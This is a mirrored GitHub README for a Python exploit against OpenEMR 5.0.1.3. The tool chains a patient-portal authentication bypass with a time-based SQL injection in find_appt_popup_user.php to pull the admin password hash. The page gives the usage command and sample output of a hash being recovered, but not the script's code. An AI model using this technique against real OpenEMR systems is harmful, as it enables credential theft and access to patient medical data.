Giters

raskolnikov90 / OpenEMR-5.0.1.3-Authentication-Bypass-Time-Based-SQLi-Exploit

Exploit that combines two known vulnerabilities in OpenEMR 5.0.1.3 to extract the admin account hash

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

OpenEMR 5.0.1.3 Authentication Bypass Time Based SQLi Exploit

This script abuses two known vulnerabilities to extract the admin password hash: An authentication bypass to the Patient portal and SQL injection found in find_appt_popup_user.php

https://packetstormsecurity.com/files/163181/OpenEMR-5.0.1.3-Authentication-Bypass.html

https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf

Usage:

python3 openemrsqli.py IP:PORT

Result example:

[+] Host Vulnerable. Proceeding exploit
...
$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFn
$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFnB
$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFnBy
[+] Hash:$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFnBy

About

Exploit that combines two known vulnerabilities in OpenEMR 5.0.1.3 to extract the admin account hash

Languages

Language:Python 100.0%